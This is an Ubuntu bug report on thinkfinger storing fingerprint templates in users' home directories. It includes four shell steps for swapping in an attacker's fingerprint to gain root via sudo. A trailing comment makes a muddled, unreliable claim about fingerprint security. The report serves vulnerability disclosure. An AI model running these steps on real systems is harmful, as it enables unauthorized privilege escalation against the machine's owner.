Fingerprints stored in unsafe location
Bug #235297 reported by
Tom Jaeger
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
thinkfinger (Ubuntu) |
Confirmed
|
Undecided
|
Unassigned |
Bug Description
Fingerprints are stored in a user's home directory. This leads to a privilege escalation bug that is trivial to exploit given access to a user account and the fingerprint reader:
mv .thinkfinger.bir .thinkfinger.bir~ # save fingerprint
tf-tool --acquire # enroll the attacker's fingerprint
sudo ... # become root with the newly registered fingerprint
mv .thinkfinger.bir~ .thinkfinger.bir # restore original fingerprint
You might argue that giving an untrusted individual access to a user account is a problem in and of itself, but this is making it a little too easy to become root.
Changed in thinkfinger: | |
status: | New → Confirmed |
To post a comment you must log in.
Fingerprint authentication is secure unless part of a two-factor scheme. Even without compromising an admin user's account, there's often enough information on say a laptop screen to break a fingerprint auth.